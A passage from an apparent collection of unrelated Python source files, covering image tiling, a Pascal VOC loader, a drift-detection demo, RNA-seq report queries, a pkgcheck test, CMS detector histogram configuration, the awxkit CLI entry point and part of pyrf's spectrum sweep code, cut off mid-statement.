"imageSize": image_size
})
square_source = Image(width=image_size, height=image_size)
square_source.composite(source,
(square_source.width - source.width) // 2,
(square_source.height - source.height) // 2)
for z in range(1, max_zoom + 1):
source_size = int(args.tile_size * (2 ** (max_zoom - z)))
logging.info("zoom level %d: source %dx%d", z, source_size, source_size)
current_image = 0
total_images = (image_size // source_size) ** 2
        start_time = last_report_time = time.perf_counter()  # time.clock() was removed in Python 3.8
for y in range(0, image_size // source_size):
for x in range(0, image_size // source_size):
crop_x, crop_y = x * source_size, y * source_size
path = "%s-tiles/%d/%d/%d.png" % (args.image.name, z, x, y)
logging.debug("tile %s: source %dx%d%+d%+d",
path, source_size, source_size, crop_x, crop_y)
with square_source.clone() as tile:
tile.crop(crop_x, crop_y, width=source_size, height=source_size)
tile.resize(tile_size, tile_size)
os.makedirs(os.path.dirname(path), exist_ok=True)
tile.save(filename=path)
current_image += 1
                if time.perf_counter() - last_report_time > 1:
                    last_report_time = time.perf_counter()
eta = (last_report_time - start_time) / current_image * \
(total_images - current_image)
logging.info("completion: %.2f%% (ETA: %dh%dm%ds)",
current_image / total_images * 100,
eta // 3600, (eta % 3600) // 60, eta % 60)
with open("%s.json" % args.image.name, "w") as descr:
descr.write(json.dumps({
"name": "???",
"scale": None,
"layers": layers
}))
logging.info("image description written to: %s" % descr.name)
logging.info("done")
|
65845
|
import logging
import os
import numpy as np
import xml.etree.ElementTree as ET
from PIL import Image
from paths import DATASETS_ROOT
log = logging.getLogger()
VOC_CATS = ['__background__', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train',
'tvmonitor']
class VOCLoader():
def __init__(self, year, split, segmentation=False, augmented_seg=False):
assert year in ['07', '12']
self.dataset = 'voc'
self.year = year
self.root = os.path.join(DATASETS_ROOT, 'VOCdevkit/VOC20%s/' % year)
self.split = split
assert split in ['train', 'val', 'trainval', 'test']
cats = VOC_CATS
self.cats_to_ids = dict(map(reversed, enumerate(cats)))
self.ids_to_cats = dict(enumerate(cats))
self.num_classes = len(cats)
self.categories = cats[1:]
self.segmentation = segmentation
self.augmented_seg = augmented_seg
        assert not self.segmentation or self.year == '12'  # this loader only supports segmentation for VOC2012
if self.augmented_seg:
filelist = 'ImageSets/SegmentationAug/%s.txt'
elif self.segmentation:
filelist = 'ImageSets/Segmentation/%s.txt'
else:
filelist = 'ImageSets/Main/%s.txt'
with open(os.path.join(self.root, filelist % self.split), 'r') as f:
self.filenames = f.read().split('\n')[:-1]
log.info("Created a loader VOC%s %s with %i images" % (year, split, len(self.filenames)))
def load_image(self, name):
im = Image.open('%sJPEGImages/%s.jpg' % (self.root, name)).convert('RGB')
im = np.array(im) / 255.0
im = im.astype(np.float32)
return im
def get_filenames(self):
return self.filenames
def read_annotations(self, name):
bboxes = []
cats = []
tree = ET.parse('%sAnnotations/%s.xml' % (self.root, name))
root = tree.getroot()
width = int(root.find('size/width').text)
height = int(root.find('size/height').text)
difficulty = []
for obj in root.findall('object'):
cat = self.cats_to_ids[obj.find('name').text]
difficult = (int(obj.find('difficult').text) != 0)
difficulty.append(difficult)
cats.append(cat)
bbox_tag = obj.find('bndbox')
x = int(bbox_tag.find('xmin').text)
y = int(bbox_tag.find('ymin').text)
w = int(bbox_tag.find('xmax').text)-x
h = int(bbox_tag.find('ymax').text)-y
bboxes.append((x, y, w, h))
gt_cats = np.array(cats)
gt_bboxes = np.array(bboxes).reshape((len(bboxes), 4))
difficulty = np.array(difficulty)
seg_gt = self.read_segmentations(name, height, width)
output = gt_bboxes, seg_gt, gt_cats, width, height, difficulty
return output
def read_segmentations(self, name, height, width):
if self.segmentation:
try:
seg_folder = self.root + 'SegmentationClass/'
seg_file = seg_folder + name + '.png'
seg_map = Image.open(seg_file)
            except IOError:  # fall back to the augmented segmentation masks
assert self.augmented_seg
seg_folder = self.root + 'SegmentationClassAug/'
seg_file = seg_folder + name + '.png'
seg_map = Image.open(seg_file)
segmentation = np.array(seg_map, dtype=np.uint8)
else:
# if there is no segmentation for a particular image we fill the mask
# with zeros to keep the same amount of tensors but don't learn from it
segmentation = np.zeros([height, width], dtype=np.uint8) + 255
return segmentation
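# Minimal usage sketch (the split and paths are assumptions; DATASETS_ROOT
# must point at a directory containing VOCdevkit/VOC2012):
#
#   loader = VOCLoader('12', 'train', segmentation=True)
#   name = loader.get_filenames()[0]
#   image = loader.load_image(name)   # float32 RGB array scaled to [0, 1]
#   bboxes, seg, cats, width, height, difficulty = loader.read_annotations(name)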
|
65846
|
import numpy as np
from skmultiflow.drift_detection import ADWIN
def demo():
""" _test_adwin
In this demo, an ADWIN object evaluates a sequence of numbers corresponding to 2 distributions.
The ADWIN object indicates the indices where change is detected.
The first half of the data is a sequence of randomly generated 0's and 1's.
    The second half of the data is a sequence of uniformly distributed random integers from 0 to 7.
"""
adwin = ADWIN()
size = 2000
change_start = 999
np.random.seed(1)
data_stream = np.random.randint(2, size=size)
data_stream[change_start:] = np.random.randint(8, size=size-change_start)
for i in range(size):
adwin.add_element(data_stream[i])
if adwin.detected_change():
print('Change has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
if __name__ == '__main__':
demo()
|
65874
|
from RnaseqDiffExpressionReport import ProjectTracker
from RnaseqDiffExpressionReport import linkToEnsembl, linkToUCSC
class TopDifferentiallyExpressedGenes(ProjectTracker):
'''output differentially expressed genes.'''
limit = 10
pattern = '(.*)_gene_diff'
sort = ''
def __call__(self, track, slice=None):
statement = '''SELECT DISTINCT a.gene_name,
a.gene_id,
a.gene_biotype,
t.l2fold,
t.treatment_mean,
t.control_mean,
t.pvalue,
t.qvalue,
s.contig, s.start, s.end
FROM %(track)s_gene_diff as t,
annotations.transcript_info as a,
annotations.gene_stats as s
WHERE a.gene_id = t.test_id AND
s.gene_id = t.test_id AND
t.significant
ORDER BY %(sort)s
LIMIT %(limit)i'''
data = self.getAll(statement)
if data:
data['gene_id'] = [linkToEnsembl(x) for x in data["gene_id"]]
data["locus"] = [linkToUCSC(*x) for x in zip(
data["contig"],
data["start"],
data["end"])]
return data
statement = '''SELECT DISTINCT t.test_id,
t.l2fold,
t.treatment_mean,
t.control_mean,
t.pvalue,
t.qvalue
FROM %(track)s_gene_diff as t
WHERE
t.significant
ORDER BY %(sort)s
LIMIT %(limit)i'''
return self.getAll(statement)
class TopUpRegulatedGenes(TopDifferentiallyExpressedGenes):
sort = 't.l2fold DESC'
class TopDownRegulatedGenes(TopDifferentiallyExpressedGenes):
    sort = 't.l2fold ASC'
class AllDifferentiallyExpressedGenes(ProjectTracker):
'''output differentially expressed genes.'''
limit = 1000
pattern = '(.*)_gene_diff'
def __call__(self, track, slice=None):
statement = '''SELECT DISTINCT a.gene_name,
a.gene_id,
a.gene_biotype,
t.l2fold,
t.treatment_mean,
t.control_mean,
t.pvalue,
t.qvalue,
s.contig, s.start, s.end
FROM %(track)s_gene_diff as t,
annotations.transcript_info as a,
annotations.gene_stats as s
WHERE a.gene_id = t.test_id AND
s.gene_id = t.test_id AND
t.significant
ORDER BY t.l2fold DESC LIMIT %(limit)i'''
data = self.getAll(statement)
if data:
data['gene_id'] = [linkToEnsembl(x) for x in data["gene_id"]]
data["locus"] = [linkToUCSC(*x) for x in zip(
data["contig"],
data["start"],
data["end"])]
return data
statement = '''SELECT DISTINCT t.test_id,
t.l2fold,
t.treatment_mean,
t.control_mean,
t.pvalue,
t.qvalue
FROM %(track)s_gene_diff as t
WHERE
t.significant
ORDER BY t.l2fold DESC LIMIT %(limit)i'''
return self.getAll(statement)
|
65892
|
from pkgcheck.checks import dropped_keywords
from snakeoil.cli import arghparse
from .. import misc
class TestDroppedKeywords(misc.ReportTestCase):
check_kls = dropped_keywords.DroppedKeywordsCheck
def mk_pkg(self, ver, keywords='', eclasses=(), **kwargs):
return misc.FakePkg(
f"dev-util/diffball-{ver}",
data={
**kwargs,
"KEYWORDS": keywords,
"_eclasses_": eclasses,
})
def mk_check(self, arches=('x86', 'amd64'), verbosity=0):
options = arghparse.Namespace(arches=arches, verbosity=verbosity)
return self.check_kls(options, arches_addon=None)
def test_it(self):
# single version, shouldn't yield.
check = self.mk_check()
self.assertNoReport(check, [self.mk_pkg('1')])
# ebuilds without keywords are skipped
self.assertNoReport(
check, [self.mk_pkg("1", "x86 amd64"), self.mk_pkg("2")])
# ensure it limits itself to just the arches we care about
# check unstable at the same time;
# finally, check '-' handling; if x86 -> -x86, that's valid.
self.assertNoReport(
check,
[self.mk_pkg("1", "x86 ~amd64 ppc"),
self.mk_pkg("2", "~amd64 x86"),
self.mk_pkg("3", "-amd64 x86")])
# check added keyword handling
self.assertNoReport(
check,
[self.mk_pkg("1", "amd64"),
self.mk_pkg("2", "x86"),
self.mk_pkg("3", "~x86 ~amd64")])
# check special keyword handling
for key in ('-*', '*', '~*'):
self.assertNoReport(
check,
[self.mk_pkg("1", "x86 ~amd64"),
self.mk_pkg("2", key)])
# ensure it doesn't flag live ebuilds
self.assertNoReport(
check,
[self.mk_pkg("1", "x86 amd64"),
self.mk_pkg("9999", "", PROPERTIES='live')])
def test_verbose_mode(self):
# verbose mode outputs a report per version with dropped keywords
check = self.mk_check(verbosity=1)
reports = self.assertReports(
check,
[self.mk_pkg("1", "amd64 x86"),
self.mk_pkg("2", "amd64"),
self.mk_pkg("3", "amd64")])
assert len(reports) == 2
assert {x.version for x in reports} == {"2", "3"}
assert set().union(*(x.arches for x in reports)) == {"x86"}
def test_regular_mode(self):
# regular mode outputs the most recent pkg with dropped keywords
check = self.mk_check()
reports = self.assertReports(
check,
[self.mk_pkg("1", "x86 amd64"),
self.mk_pkg("2", "amd64"),
self.mk_pkg("3", "amd64")])
assert len(reports) == 1
assert reports[0].version == '3'
assert set().union(*(x.arches for x in reports)) == {"x86"}
|
65919
|
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDHarvester import DQMEDHarvester
from DQM.SiPixelPhase1Common.HistogramManager_cfi import *
import DQM.SiPixelPhase1Common.TriggerEventFlag_cfi as trigger
SiPixelPhase1TrackEfficiencyValid = DefaultHistoTrack.clone(
name = "valid",
title = "Valid Hits",
range_min = 0, range_max = 50, range_nbins = 50,
xlabel = "valid hits",
dimensions = 0,
specs = VPSet(
StandardSpecifications1D_Num,
#StandardSpecification2DProfile_Num, #for this we have the on track clusters map (i.e the same thing)
Specification().groupBy("PXBarrel/PXLayer/Event") #this will produce inclusive counts per Layer/Disk
.reduce("COUNT")
.groupBy("PXBarrel/PXLayer")
.save(nbins=50, xmin=0, xmax=1500),
Specification().groupBy("PXForward/PXDisk/Event")
.reduce("COUNT")
.groupBy("PXForward/PXDisk/")
.save(nbins=50, xmin=0, xmax=1500),
)
)
SiPixelPhase1TrackEfficiencyInactive = DefaultHistoTrack.clone(
name = "inactive",
title = "Inactive Hits",
xlabel = "inactive hits",
range_min = 0, range_max = 25, range_nbins = 25,
dimensions = 0,
specs = VPSet(
StandardSpecification2DProfile_Num,
Specification().groupBy("PXBarrel/PXLayer/Event") #this will produce inclusive counts per Layer/Disk
.reduce("COUNT")
.groupBy("PXBarrel/PXLayer")
.save(nbins=50, xmin=0, xmax=100),
Specification().groupBy("PXForward/PXDisk/Event")
.reduce("COUNT")
.groupBy("PXForward/PXDisk/")
.save(nbins=50, xmin=0, xmax=100),
)
)
SiPixelPhase1TrackEfficiencyMissing = DefaultHistoTrack.clone(
name = "missing",
title = "Missing Hits",
range_min = 0, range_max = 25, range_nbins = 25,
xlabel = "missing hits",
dimensions = 0,
specs = VPSet(
StandardSpecifications1D_Num,
StandardSpecification2DProfile_Num,
Specification().groupBy("PXBarrel/PXLayer/Event") #this will produce inclusive counts per Layer/Disk
.reduce("COUNT")
.groupBy("PXBarrel/PXLayer")
.save(nbins=50, xmin=0, xmax=100),
Specification().groupBy("PXForward/PXDisk/Event")
.reduce("COUNT")
.groupBy("PXForward/PXDisk/")
.save(nbins=50, xmin=0, xmax=100),
)
)
SiPixelPhase1TrackEfficiencyEfficiency = SiPixelPhase1TrackEfficiencyValid.clone(
name = "hitefficiency",
title = "Hit Efficiency",
xlabel = "#valid/(#valid+#missing)",
dimensions = 1,
specs = VPSet(
StandardSpecification2DProfile,
#profiles per layer and shell
Specification(PerLadder).groupBy("PXBarrel/Shell/PXLayer/SignedLadder")
.reduce("MEAN")
.groupBy("PXBarrel/Shell/PXLayer", "EXTEND_X")
.save(),
Specification(PerLadder).groupBy("PXForward/HalfCylinder/PXRing/PXDisk/SignedBlade")
.reduce("MEAN")
.groupBy("PXForward/HalfCylinder/PXRing/PXDisk", "EXTEND_X")
.save(),
#per layer
Specification().groupBy("PXBarrel/PXLayer")
.reduce("MEAN")
.groupBy("PXBarrel", "EXTEND_X")
.save(),
Specification().groupBy("PXForward/PXDisk")
.reduce("MEAN")
.groupBy("PXForward", "EXTEND_X")
.save(),
Specification(PerLayer2D)
.groupBy("PXBarrel/PXLayer/Lumisection")
.groupBy("PXBarrel/PXLayer", "EXTEND_X")
.groupBy("PXBarrel", "EXTEND_Y")
.reduce("MEAN")
.save(),
Specification(PerLayer2D)
.groupBy("PXForward/PXDisk/Lumisection")
.groupBy("PXForward/PXDisk", "EXTEND_X")
.groupBy("PXForward", "EXTEND_Y")
.reduce("MEAN")
.save(),
)
)
SiPixelPhase1TrackEfficiencyVertices = DefaultHistoTrack.clone(
name = "num_vertices",
title = "PrimaryVertices",
xlabel= "# Vertices",
dimensions = 1,
range_min = -0.5,
range_max = 100.5,
    range_nbins = 101,
specs = VPSet(
Specification().groupBy("")
.save(),
Specification().groupBy("/Lumisection")
.reduce("MEAN")
.groupBy("","EXTEND_X")
.save()
)
)
from Configuration.Eras.Modifier_run3_common_cff import run3_common
run3_common.toModify(SiPixelPhase1TrackEfficiencyVertices, range_max = 150.5, range_nbins=151)
SiPixelPhase1TrackEfficiencyConf = cms.VPSet(
SiPixelPhase1TrackEfficiencyValid,
SiPixelPhase1TrackEfficiencyMissing,
SiPixelPhase1TrackEfficiencyInactive,
SiPixelPhase1TrackEfficiencyEfficiency,
SiPixelPhase1TrackEfficiencyVertices
)
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
SiPixelPhase1TrackEfficiencyAnalyzer = DQMEDAnalyzer('SiPixelPhase1TrackEfficiency',
clusters = cms.InputTag("siPixelClusters"),
tracks = cms.InputTag("generalTracks"),
trajectoryInput = cms.InputTag("refittedForPixelDQM"),
primaryvertices = cms.InputTag("offlinePrimaryVertices"),
tracker = cms.InputTag("MeasurementTrackerEvent"),
histograms = SiPixelPhase1TrackEfficiencyConf,
geometry = SiPixelPhase1Geometry,
triggerflags = trigger.SiPixelPhase1Triggers,
VertexCut = cms.untracked.bool(True)
)
SiPixelPhase1TrackEfficiencyHarvester = DQMEDHarvester("SiPixelPhase1Harvester",
histograms = SiPixelPhase1TrackEfficiencyConf,
geometry = SiPixelPhase1Geometry
)
|
65926
|
import json
import sys
import traceback
import yaml
import urllib3
from requests.exceptions import ConnectionError, SSLError
from .client import CLI
from awxkit.utils import to_str
from awxkit.exceptions import Unauthorized, Common
from awxkit.cli.utils import cprint
# you'll only see these warnings if you've explicitly *disabled* SSL
# verification, so they're a little annoying, redundant
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def run(stdout=sys.stdout, stderr=sys.stderr, argv=[]):
cli = CLI(stdout=stdout, stderr=stderr)
try:
cli.parse_args(argv or sys.argv)
cli.connect()
cli.parse_resource()
except KeyboardInterrupt:
sys.exit(1)
except ConnectionError as e:
cli.parser.print_help()
msg = (
'\nThere was a network error of some kind trying to reach '
'{}.\nYou might need to specify (or double-check) '
'--conf.host'.format(cli.get_config('host'))
)
if isinstance(e, SSLError):
msg = (
'\nCould not establish a secure connection. '
'\nPlease add your server to your certificate authority.'
'\nYou can also run this command by specifying '
'-k or --conf.insecure'
)
cprint(msg + '\n', 'red', file=stderr)
cprint(e, 'red', file=stderr)
sys.exit(1)
except Unauthorized as e:
cli.parser.print_help()
msg = '\nValid credentials were not provided.\n$ awx login --help'
cprint(msg + '\n', 'red', file=stderr)
if cli.verbose:
cprint(e.__class__, 'red', file=stderr)
sys.exit(1)
except Common as e:
if cli.verbose:
            print(traceback.format_exc(), file=sys.stderr)
if cli.get_config('format') == 'json':
json.dump(e.msg, sys.stdout)
print('')
elif cli.get_config('format') == 'yaml':
sys.stdout.write(to_str(
yaml.safe_dump(
e.msg,
default_flow_style=False,
encoding='utf-8',
allow_unicode=True
)
))
elif cli.get_config('format') == 'human':
sys.stdout.write(e.__class__.__name__)
print('')
sys.exit(1)
except Exception as e:
if cli.verbose:
e = traceback.format_exc()
cprint(e, 'red', file=stderr)
sys.exit(1)
|
65933
|
import sys
import math
import random
from collections import namedtuple
import time
from pyrf.util import (compute_usable_bins, adjust_usable_fstart_fstop,
trim_to_usable_fstart_fstop, find_saturation)
import numpy as np
from twisted.internet import defer
from pyrf.numpy_util import compute_fft
import struct
MAXIMUM_SPP = 32768
class correction_vector_acquire(object):
data_buffer = ""
v_type = "SIGNAL"
dut = None
complete_buffer = False
d = None
offset = 0
size = 0
transfer_size = 16*1024
def get_vector_loop(self, data):
self.data_buffer = b"".join([self.data_buffer, data])
self.offset += len(data)
if self.offset >= self.size:
            # we have gotten all our data, return this object
if self.d is not None:
self.d.callback(self)
else:
# more data, grab another set of data
data1 = self.dut.correction_data(self.v_type, self.offset,
self.transfer_size)
# and add this function to the call back
data1.addCallback(self.get_vector_loop)
def get_vector_data(self, size):
        # We got our size
        if size is None:
            # a size of None is propagated through the deferred created in get_vector
if self.d is not None:
self.d.callback(None)
return
self.size = int(size)
if self.size == 0:
if self.d is not None:
self.d.callback(None)
return
if self.size < self.transfer_size:
self.transfer_size = self.size
        # Grab our first set of data (deferred)
data = self.dut.correction_data(self.v_type, self.offset,
self.transfer_size)
# add the self.get_vector_loop call back
data.addCallback(self.get_vector_loop)
        # what happens to the errback here?
def error_b(self, failure):
if self.d is not None:
self.d.callback(None)
return None
def get_vector(self, v_type=None):
        self.v_type = v_type
        self.offset = 0
        self.data_buffer = b""
        # Create a deferred
        d = defer.Deferred()
        self.d = d
        # get our size (deferred)
        size = self.dut.correction_size(self.v_type)
size.addCallback(self.get_vector_data)
size.addErrback(self.error_b)
# return our deferred
return d
class correction_vector(object):
correction_vectors = None
frequency_index = None
digest = None
def __init__(self):
self.frequency_index = []
self.dy = np.dtype(np.int32)
self.dy = self.dy.newbyteorder('>')
self.correction_vectors = {}
def _binary_search(self, freq):
        # Simple binary search, modified to work with the object's data structure
lo = 0
hi = len(self.frequency_index)
while lo < hi:
mid = (lo + hi) // 2
if self.frequency_index[mid][0] * 1e3 < freq:
lo = mid + 1
else:
hi = mid
return lo
def _interp(self, in_array, number_of_points):
        # array indices of our original vector, from 0 to vector size - 1
x = np.arange(0.0, self.vector_size, 1.0)
# our new index
z = np.linspace(0.0, self.vector_size - 1, number_of_points)
# interpolate to get our new vector array
out_array = np.interp(z, x, in_array)
return out_array
def get_correction_vector(self, freq, number_of_points):
        # binary search returns our index
        index = self._binary_search(freq)
        # handle the case where we go off the end
if index == len(self.frequency_index):
index = index - 1
# get our vector
vector = self.correction_vectors[self.frequency_index[index][1]]
# convert from micro db to db
vector = vector / 1000000.0
# interpolate our vector to the wanted size
resampled_vector = self._interp(vector, number_of_points)
return resampled_vector
def buffer_to_vector(self, buffer_in):
if buffer_in is None:
raise ValueError
if len(buffer_in) < 8 + 40:
raise ValueError
# Get the first 8 bytes
offset = 0
size = 8
input_buffer = buffer_in[offset:offset + size]
version, freq_num, vector_num, self.vector_size = struct.unpack("!HHHH", input_buffer)
offset = size
        # Skip the next 40 reserved bytes (currently unused)
offset += 40
# grab our frequency list
size = 6 * freq_num
input_buffer = buffer_in[offset:offset + size]
offset += size
if len(input_buffer) < size:
raise ValueError
# loop over our buffer, adding a frequency pair to the array
for i in range(freq_num):
freq, index = struct.unpack("!LH", input_buffer[i*6:i*6+6])
self.frequency_index.append([freq, index])
# grab our correction vectors
for i in range(vector_num):
            # Grab our index
size = 2
input_buffer = buffer_in[offset:offset + size]
index = struct.unpack(">H", input_buffer)[0]
offset += size
# get our correction vector
size = 4 * self.vector_size
input_buffer = buffer_in[offset:offset + size]
micro_db = np.frombuffer(input_buffer, dtype=self.dy,
count=self.vector_size)
self.correction_vectors[index] = micro_db
offset += size
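# Minimal sketch of a synthetic buffer matching the layout parsed by
# buffer_to_vector above (a hypothetical test helper, not part of the
# original module): a !HHHH header (version, freq_num, vector_num,
# vector_size), 40 reserved bytes, freq_num !LH frequency/index pairs
# (frequency in kHz), then per vector a >H index followed by vector_size
# big-endian int32 micro-dB values.
def _make_example_vector_buffer():
    header = struct.pack("!HHHH", 1, 1, 1, 4)     # one frequency, one 4-point vector
    reserved = b"\x00" * 40
    freq_index = struct.pack("!LH", 2450000, 0)   # 2.45 GHz (stored in kHz), vector index 0
    vector = struct.pack(">H", 0) + struct.pack(">4i", 0, 1000000, 2000000, 3000000)
    return header + reserved + freq_index + vector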
class SweepDeviceError(Exception):
"""
    Exception for the sweep device to state an error has occurred
"""
pass
class SweepSettings(object):
"""
An object used to keep track of the sweep settings
"""
def __init__(self):
# start frequency of the results we will eventually return
self.bandstart = 0.0
# stop frequency of the results we will eventually return
self.bandstop = 0.0
# sweep entry's start frequency
self.fstart = 0.0
# sweep entry's stop frequency
self.fstop = 0.0
# sweep entry frequency step
self.fstep = 0.0
# sweep entry's RFE mode
self.rfe_mode = None
# determine if a second entry is required
self.dd_mode = False
# determines if a non dd entry is needed
self.beyond_dd = True
# entry attenuation
self.attenuation = 0
# entry ppb
self.ppb = 1
# sweep entry's spp
self.spp = 0.0
# sweep capture iterations
self.iterations = 0
# expected spectral points
self.spectral_points = 0
# determines if a sweep entry is required at the end
self.make_end_entry = False
# determine the frequency of the end entry
self.end_entry_freq = 0.0
# how many steps are in this sweep
self.step_count = 0
# what's the actual RBW of what we're capturing
self.rbw = 0
def __str__(self):
return "SweepSettings[ bandstart = %d, bandstop = %d, fstart = %d, fstop = %d, fstep = %d, step_count = %d, rfe_mode = %s, dd_mode = %s, beyond_dd = %s, attenuation = %s, ppb = %d, spp = %d, iterations = %d, spectral_points = %d, make_end_entry = %s, end_entry_freq = %d, rbw = %f ]" % (self.bandstart, self.bandstop, self.fstart, self.fstop, self.fstep, self.step_count, self.rfe_mode, self.dd_mode, self.beyond_dd, self.attenuation, self.ppb, self.spp, self.iterations, self.spectral_points, self.make_end_entry, self.end_entry_freq, self.rbw)
class SweepPlanner(object):
"""
    An object that plans a sweep based on given parameters.
:param dev_prop: the sweep device properties
:type dev_prop: dict
"""
def __init__(self, dev_prop):
self.dev_properties = dev_prop
self._prev_settings = SweepSettings()
def plan_sweep(self, fstart, fstop, rbw, mode, dev_settings = {}):
"""
Plan the sweep given the inputs
"""
# initialize the sweep settings variable
sweep_settings = SweepSettings()
# assign the sweep mode and start/stop
sweep_settings.rfe_mode = mode
sweep_settings.bandstart = fstart
sweep_settings.bandstop = fstop
if 'attenuator' in dev_settings:
sweep_settings.attenuation = dev_settings['attenuator']
# grab the usable bw of the current mode
usable_bw = self.dev_properties.USABLE_BW[mode]
# calculate the required SPP to get the RBW desired
sweep_settings.spp = self.dev_properties.FULL_BW[mode] / rbw
# find closest multiple of 32 because hardware
sweep_settings.spp = int(32 * round(float(sweep_settings.spp) / 32))
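        # e.g. (hypothetical numbers) a 125 MHz FULL_BW with a requested
        # 100 kHz RBW gives spp = 1250, rounded to 1248, the nearest
        # multiple of 32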
# double the points for SH/SHN mode
if mode in ['SH', 'SHN']:
sweep_settings.spp = sweep_settings.spp * 2
        # if we're using zif mode, but we have a DD entry, we have half the SPP available, since DD is I-only and ZIF is IQ
if (mode == 'ZIF') and sweep_settings.dd_mode:
            maxspp = self.dev_properties.MAX_SPP // 2  # integer division keeps spp an int
else:
maxspp = self.dev_properties.MAX_SPP
# adjust SPP if it's too big
sweep_settings.spp = min(maxspp, sweep_settings.spp)
# figure out our actual RBW (account for real vs complex data)
sweep_settings.rbw = self.dev_properties.FULL_BW[mode] / sweep_settings.spp
if not (mode == 'ZIF'):
sweep_settings.rbw = sweep_settings.rbw * 2
        # make sure our result is at least 1 RBW big
if (sweep_settings.bandstop - sweep_settings.bandstart) < sweep_settings.rbw:
fstop = sweep_settings.bandstart + sweep_settings.rbw
sweep_settings.bandstop = fstop
# change fstart and stop by a bit to account for floating point errors
# TODO: make this take into account tuning resolution
fstart -= sweep_settings.rbw * 4
fstop += sweep_settings.rbw * 4
# calculate fstart frequency
if fstart < self.dev_properties.MIN_TUNABLE[mode]:
sweep_settings.dd_mode = True
sweep_settings.fstart = self.dev_properties.MIN_TUNABLE[mode] + (usable_bw / 2)
sweep_settings.step_count += 1
# make sure we don't accidentally make an fstart that's beyond our tuning range
elif (fstart + (usable_bw / 2)) > self.dev_properties.MAX_TUNABLE[mode]:
sweep_settings.dd_mode = False
sweep_settings.fstart = self.dev_properties.MAX_TUNABLE[mode] - (usable_bw / 2)
else:
sweep_settings.dd_mode = False
sweep_settings.fstart = fstart + (usable_bw / 2)
# check if non-dd mode is required
if fstop <= self.dev_properties.MIN_TUNABLE[mode]:
sweep_settings.beyond_dd = False
else:
sweep_settings.beyond_dd = True
sweep_settings.step_count += 1
# assign the sweep entry's step frequency reducing by a couple rbw to account for floating point errors
# TODO: make this take into account tuning resolution
sweep_settings.fstep = usable_bw - (sweep_settings.rbw * 4)
# calculate the fstop of the sweep entry from fstart and how many usable_bw's we need
fspan = fstop - sweep_settings.fstart - sweep_settings.rbw
required_steps = round(fspan / sweep_settings.fstep)
sweep_settings.fstop = sweep_settings.fstart + (required_steps * sweep_settings.fstep)
sweep_settings.step_count += required_steps
# make sure fstop is lower than max tunable
# - it can sometimes be higher if an fstart is chosen, such that our
# fstep causes our fstop to go beyond fmax to cover all the band required
sweep_settings.make_end_entry = False
sweep_settings.end_entry_freq = 0
if sweep_settings.fstop > self.dev_properties.MAX_TUNABLE[mode]:
# go back one step
sweep_settings.fstop -= sweep_settings.fstep
# add an entry for fmax
sweep_settings.make_end_entry = True
sweep_settings.end_entry_freq = self.dev_properties.MAX_TUNABLE[mode] - (usable_bw / 2)
# calculate the expected number of spectral bins required for the SweepEntry
sweep_settings.spectral_points = int(round((sweep_settings.bandstop - sweep_settings.bandstart) / sweep_settings.rbw))
# return the sweep_settings
return sweep_settings
class SweepDevice(object):
"""
Virtual device that generates power spectrum from a given frequency range
by sweeping the frequencies with a real device and piecing together the FFT results.
:param real_device: the RF device that will be used for capturing data,
typically a :class:`pyrf.devices.thinkrf.WSA` instance.
:param async_callback: a callback to use for async operation (not used if
*real_device* is using a blocking :class:`PlainSocketConnector`)
"""
# keep track of the mode
rfe_mode = None
# keep track of the fstart/fstop and rbw
fstart = None
fstop = None
rbw = None
# keep track of non-standard device settings
device_settings = None
# keep track of whether DD mode is needed
dd_mode = False
# keep track of the sweep settings
_sweep_settings = None
# keep track of the packet count
packet_count = 0
# determine if a new entry is required
_new_entry = True
# array to place spectral data
spectral_data = []
capture_count = 0
sp_corr_obj = None
nf_corr_obj = None
_flattening_enabled = True
def __init__(self, real_device, async_callback=None):
# init log string
self.logstr = ''
self.logtype = 'NONE'
# initialize the real device
self.real_device = real_device
# request read permission from device
self.real_device.request_read_perm()
# keep track of the device properties
self.dev_properties = self.real_device.properties
# initialize the geolocation callback
self._geo_callback_func = None
self._geo_callback_data = None
# initialize the sweep planner
self._sweep_planner = SweepPlanner(self.dev_properties)
# make sure user passes async callback if the device has async connector
if real_device.async_connector():
if not async_callback:
raise SweepDeviceError(
"async_callback required for async operation")
# disable receiving data until we are expecting it
real_device.set_async_callback(None)
# Function to be called when async data is done capturing
def _save_correction_vector(data_buffer):
if data_buffer is None:
return None
try:
if data_buffer.v_type == "SIGNAL":
self.sp_corr_obj = correction_vector()
self.sp_corr_obj.buffer_to_vector(data_buffer.data_buffer)
elif data_buffer.v_type == "NOISE":
self.nf_corr_obj = correction_vector()
self.nf_corr_obj.buffer_to_vector(data_buffer.data_buffer)
except AttributeError:
if data_buffer.v_type == "SIGNAL":
self.sp_corr_obj = None
elif data_buffer.v_type == "NOISE":
self.nf_corr_obj = None
# function to catch the errback of the async code. Used to handle
# the case when we can get the correction vectors.
def _catch_timeout(failure):
failure.trap(IOError)
return None
vector_obj = correction_vector_acquire()
vector_obj.dut = real_device
vector_obj1 = correction_vector_acquire()
vector_obj1.dut = real_device
d1 = vector_obj.get_vector("NOISE")
d1.addCallback(_save_correction_vector)
d1.addErrback(_catch_timeout)
d2 = vector_obj1.get_vector("SIGNAL")
d2.addCallback(_save_correction_vector)
d2.addErrback(_catch_timeout)
else:
            # make sure user doesn't pass async callback if the connector uses blocking sockets
if async_callback:
raise SweepDeviceError(
"async_callback not applicable for sync operation")
def _get_correction(dut, v_type=None):
if v_type.upper() == "SIGNAL" or v_type.upper() == "NOISE":
v_type = v_type.upper()
else:
raise ValueError
max_buf_size = 16*1024
offset = 0
bin_data = ""
try:
signal_size = dut.correction_size(v_type)
except (IOError, OSError): # this will handle socket.error's
raise ValueError
# We have nothing to transfer
if signal_size == 0:
return None
                # check to see if there is more data than can be
                # transferred in one go
if signal_size > max_buf_size:
# if so transfer our max buffer size
transfer_size = max_buf_size
else:
# if not grab only what we need
transfer_size = signal_size
# While we still have data remaining
while offset < signal_size:
# get the data
data_buffer = dut.correction_data(v_type, offset,
transfer_size)
                    # figure out how many bytes were transferred
transfered = len(data_buffer)
                    # append the data to the buffer of what we have already got
bin_data = b"".join([bin_data, data_buffer])
# increase the offset
offset = offset + transfered
return bin_data
self.sp_corr_obj = correction_vector()
try:
